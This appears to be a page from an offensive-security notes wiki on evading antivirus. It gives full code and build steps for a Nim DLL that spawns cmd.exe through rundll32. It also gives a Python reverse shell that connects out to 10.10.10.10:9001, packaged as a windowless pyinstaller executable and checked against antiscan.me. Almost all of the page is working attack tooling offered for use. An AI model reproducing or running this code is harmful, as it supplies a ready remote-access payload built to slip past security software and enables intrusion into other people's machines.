AV Evading

Using DLL

Crafting

Open cmd , cd to nim directory : C:\Users\Administrator\.nimble\bin

import osproc
import winim

proc NimMain() {.cdecl, importc.}

proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
  NimMain()

  if fdwReason == DLL_PROCESS_ATTACH:
    discard osproc.execProcess("cmd.exe")

  return true

save the code as file.nim

Compile

nim c -d=mingw --app=lib --nomain --cpu=amd64 .\file.nim

Execution

rundll32.exe file.dll,DllMain

References : https://github.com/byt3bl33d3r/OffensiveNim

GitHub - yglukhov/nimx: GUI libraryGitHub

Using pyinstaller

Payload

import os,socket,subprocess,threading;
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.10.10",9001))

p=subprocess.Popen(["cmd"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

Compiling

cd C:\Users\Administrator\AppData\Local\Programs\Python\Python311\Scripts>p
pip install pyinstaller

pyinstaller.exe --noconsole --onefile  C:\Users\Administrator\Desktop\runit3.py

exe file will be located in dist folder

Malware File Checking

https://antiscan.me/

PreviousWindow NextChrome Password Extract

Last updated 1 year ago